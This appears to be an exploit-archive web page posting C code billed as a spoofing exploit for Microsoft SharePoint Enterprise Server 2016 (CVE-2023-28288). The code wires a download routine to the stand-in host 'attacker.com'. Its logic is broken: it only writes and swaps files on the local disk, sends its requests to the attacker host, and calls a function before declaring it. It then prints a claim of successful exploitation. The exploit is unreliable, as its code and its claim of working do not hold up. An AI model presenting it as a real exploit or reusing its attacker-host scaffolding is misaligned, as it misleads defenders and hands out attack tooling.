what you don't know can hurt you
Home Files News &[SERVICES_TAB]About Contact Add New

Microsoft SharePoint Enterprise Server 2016 Spoofing

Microsoft SharePoint Enterprise Server 2016 Spoofing
Posted Jun 27, 2023
Authored by Amirhossein Bahramizadeh

Microsoft SharePoint Enterprise Server 2016 suffers from a spoofing vulnerability.

tags | exploit, spoof
advisories | CVE-2023-28288
SHA-256 | dc69c8a196ae434905235f744cfdcbe0d497ed7ab1caa764b015de4a98a1e4d1

Microsoft SharePoint Enterprise Server 2016 Spoofing

Change Mirror Download
// Exploit Title: Microsoft SharePoint Enterprise Server 2016 - Spoofing
// Date: 2023-06-20
// country: Iran
// Exploit Author: Amirhossein Bahramizadeh
// Category : Remote
// Vendor Homepage:
// Microsoft SharePoint Foundation 2013 Service Pack 1
// Microsoft SharePoint Server Subscription Edition
// Microsoft SharePoint Enterprise Server 2013 Service Pack 1
// Microsoft SharePoint Server 2019
// Microsoft SharePoint Enterprise Server 2016
// Tested on: Windows/Linux
// CVE : CVE-2023-28288

#include <windows.h>
#include <stdio.h>


// The vulnerable SharePoint server URL
const char *server_url = "http://example.com/";

// The URL of the fake SharePoint server
const char *fake_url = "http://attacker.com/";

// The vulnerable SharePoint server file name
const char *file_name = "vuln_file.aspx";

// The fake SharePoint server file name
const char *fake_file_name = "fake_file.aspx";

int main()
{
HANDLE file;
DWORD bytes_written;
char file_contents[1024];

// Create the fake file contents
sprintf(file_contents, "<html><head></head><body><p>This is a fake file.</p></body></html>");

// Write the fake file to disk
file = CreateFile(fake_file_name, GENERIC_WRITE, 0, NULL, CREATE_ALWAYS, FILE_ATTRIBUTE_NORMAL, NULL);
if (file == INVALID_HANDLE_VALUE)
{
printf("Error creating fake file: %d\n", GetLastError());
return 1;
}
if (!WriteFile(file, file_contents, strlen(file_contents), &bytes_written, NULL))
{
printf("Error writing fake file: %d\n", GetLastError());
CloseHandle(file);
return 1;
}
CloseHandle(file);

// Send a request to the vulnerable SharePoint server to download the file
sprintf(file_contents, "%s%s", server_url, file_name);
file = CreateFile(file_name, GENERIC_WRITE, 0, NULL, CREATE_ALWAYS, FILE_ATTRIBUTE_NORMAL, NULL);
if (file == INVALID_HANDLE_VALUE)
{
printf("Error creating vulnerable file: %d\n", GetLastError());
return 1;
}
if (!InternetReadFileUrl(file_contents, file))
{
printf("Error downloading vulnerable file: %d\n", GetLastError());
CloseHandle(file);
return 1;
}
CloseHandle(file);

// Replace the vulnerable file with the fake file
if (!DeleteFile(file_name))
{
printf("Error deleting vulnerable file: %d\n", GetLastError());
return 1;
}
if (!MoveFile(fake_file_name, file_name))
{
printf("Error replacing vulnerable file: %d\n", GetLastError());
return 1;
}

// Send a request to the vulnerable SharePoint server to trigger the vulnerability
sprintf(file_contents, "%s%s", server_url, file_name);
if (!InternetReadFileUrl(file_contents, NULL))
{
printf("Error triggering vulnerability: %d\n", GetLastError());
return 1;
}

// Print a message indicating that the vulnerability has been exploited
printf("Vulnerability exploited successfully.\n");

return 0;
}

BOOL InternetReadFileUrl(const char *url, HANDLE file)
{
HINTERNET internet, connection, request;
DWORD bytes_read;
char buffer[1024];

// Open an Internet connection
internet = InternetOpen("Mozilla/5.0 (Windows NT 10.0; Win64; x64)", INTERNET_OPEN_TYPE_PRECONFIG, NULL, NULL, 0);
if (internet == NULL)
{
return FALSE;
}

// Connect to the server
connection = InternetConnect(internet, fake_url, INTERNET_DEFAULT_HTTP_PORT, NULL, NULL, INTERNET_SERVICE_HTTP, 0, 0);
if (connection == NULL)
{
InternetCloseHandle(internet);
return FALSE;
}

// Send the HTTP request
request = HttpOpenRequest(connection, "GET", url, NULL, NULL, NULL, 0, 0);
if (request == NULL)
{
InternetCloseHandle(connection);
InternetCloseHandle(internet);
return FALSE;
}
if (!HttpSendRequest(request, NULL, 0, NULL, 0))
{
InternetCloseHandle(request);
InternetCloseHandle(connection);
InternetCloseHandle(internet);
return FALSE;
}

// Read the response data
while (InternetReadFile(request, buffer, sizeof(buffer), &bytes_read) && bytes_read > 0)
{
if (file != NULL)
{
// Write the data to disk
if (!WriteFile(file, buffer, bytes_read, &bytes_read, NULL))
{
InternetCloseHandle(request);
InternetCloseHandle(connection);
InternetCloseHandle(internet);
return FALSE;
}
}
}

InternetCloseHandle(request);
InternetCloseHandle(connection);
InternetCloseHandle(internet);
return TRUE;
}


Login or Register to add favorites

File Archive:

September 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Sep 1st
    261 Files
  • 2
    Sep 2nd
    17 Files
  • 3
    Sep 3rd
    38 Files
  • 4
    Sep 4th
    52 Files
  • 5
    Sep 5th
    23 Files
  • 6
    Sep 6th
    27 Files
  • 7
    Sep 7th
    0 Files
  • 8
    Sep 8th
    1 Files
  • 9
    Sep 9th
    16 Files
  • 10
    Sep 10th
    38 Files
  • 11
    Sep 11th
    21 Files
  • 12
    Sep 12th
    40 Files
  • 13
    Sep 13th
    18 Files
  • 14
    Sep 14th
    0 Files
  • 15
    Sep 15th
    0 Files
  • 16
    Sep 16th
    0 Files
  • 17
    Sep 17th
    0 Files
  • 18
    Sep 18th
    0 Files
  • 19
    Sep 19th
    0 Files
  • 20
    Sep 20th
    0 Files
  • 21
    Sep 21st
    0 Files
  • 22
    Sep 22nd
    0 Files
  • 23
    Sep 23rd
    0 Files
  • 24
    Sep 24th
    0 Files
  • 25
    Sep 25th
    0 Files
  • 26
    Sep 26th
    0 Files
  • 27
    Sep 27th
    0 Files
  • 28
    Sep 28th
    0 Files
  • 29
    Sep 29th
    0 Files
  • 30
    Sep 30th
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2024 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close